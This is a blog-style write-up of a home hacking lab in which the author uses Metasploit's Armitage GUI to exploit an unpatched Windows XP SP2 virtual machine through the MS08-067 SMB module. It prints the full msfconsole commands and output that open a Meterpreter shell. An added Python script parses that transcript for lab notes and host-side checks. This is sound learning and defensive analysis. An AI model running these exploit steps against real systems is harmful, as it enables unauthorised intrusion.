I just completed my first successful exploit in the marvellous Metasploit GUI Armitage.
Details of the target machine on my Virtual Hacking Lab:
Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.
First up, I added the “Host” which is the target IP address.
Then I right-clicked the “Host” and performed the scan, which is a bundle of inbuilt Metasploit scans (ftp, smtp, http, smb_versions), each gleaning information on the target.
Note the “Host” terminal image now bears the Windows logo as the detected operating system during the scan.
Then up to the toolbar Attacks >> Find attacks.
Once complete, we can right-click the “Host” and select “Attack”, which gives us a list of potential exploits.
At this point I cheated as my very first command prompt Metasploit exploit on this target machine was via “exploit/windows/smb/ms08_067_netapi” so I simply selected this from “smb” in the dropdown list.
But first I checked the exploit:
So I launched the attack and within a few seconds the “Host” terminal image changed:
The red terminal with electrical jolts indicates a compromised target.
Here’s the output of the process:
msf> use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.70
LHOST => 192.168.1.70
msf exploit(ms08_067_netapi) > set RPORT 445
RPORT => 445
msf exploit(ms08_067_netapi) > set LPORT 20855
LPORT => 20855
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.79
RHOST => 192.168.1.79
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set SMBPIPE BROWSER
SMBPIPE => BROWSER
msf exploit(ms08_067_netapi) > set TARGET 0
TARGET => 0
msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (751104 bytes) to 192.168.1.79
[*] Meterpreter session 1 opened (192.168.1.70:57239 -> 192.168.1.79:20855) at 2013-09-02 18:27:27 +0100
meterpreter >
As you can see, I have obtained a Meterpreter shell.
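One thing the session line above quietly shows is the traffic direction: with a bind_tcp payload the target is the listener, so the attacker (192.168.1.70, ephemeral port 57239) connects to the target (192.168.1.79) on LPORT 20855, whereas a reverse_tcp payload would have the target calling back to LHOST. The following script, added here as an illustration and not part of the original post or of Metasploit, parses the console transcript and checks that the opened session matches the listener the payload implies, which is handy for lab notes and for matching against the target's own netstat or firewall log. The transcript excerpt it parses is constructed from the output above.

```python
import re

# Constructed excerpt of the msfconsole transcript shown above (not a live capture).
TRANSCRIPT = """\
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.70
msf exploit(ms08_067_netapi) > set LPORT 20855
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.79
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
[*] Meterpreter session 1 opened (192.168.1.70:57239 -> 192.168.1.79:20855) at 2013-09-02 18:27:27 +0100
"""

# "set OPTION value" lines typed at the msf prompt.
SET_RE = re.compile(r"^msf .*> set (\w+) (\S+)$", re.M)
# "session N opened (src:port -> dst:port) at <timestamp>" lines printed by the handler.
SESSION_RE = re.compile(
    r"session (\d+) opened \((\S+):(\d+) -> (\S+):(\d+)\) at (.+)$", re.M)


def parse_options(text):
    """Return the module options as a dict, last value wins."""
    return dict(SET_RE.findall(text))


def expected_listener(opts):
    """Derive (host, port) of the listening side from the payload name."""
    payload = opts["PAYLOAD"]
    if "/bind_" in payload:          # target listens on LPORT; attacker connects in
        return (opts["RHOST"], int(opts["LPORT"]))
    if "/reverse_" in payload:       # attacker listens on LHOST:LPORT; target calls back
        return (opts["LHOST"], int(opts["LPORT"]))
    raise ValueError("unknown payload transport: " + payload)


def parse_sessions(text):
    """Extract every opened session as src/dst endpoint tuples."""
    return [
        {"id": int(n), "src": (sh, int(sp)), "dst": (dh, int(dp)), "at": when}
        for n, sh, sp, dh, dp, when in SESSION_RE.findall(text)
    ]


def check_sessions(text):
    """Return the expected listener and, per session, whether its dst matches it."""
    listener = expected_listener(parse_options(text))
    return listener, [(s["id"], s["dst"] == listener) for s in parse_sessions(text)]


if __name__ == "__main__":
    print(check_sessions(TRANSCRIPT))
```

For the bind_tcp transcript the check confirms the session terminated on 192.168.1.79:20855, i.e. a new listening port appeared on the target, which is the artefact a host-side check would catch.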
Right-clicking on the “Host” image now gives me “Meterpreter” in the dropdown with every conceivable option available at the click of a finger.
Metasploit Armitage is a fabulous tool.
Next time I’ll look to compromise an Ubuntu system that I’ve never exploited before.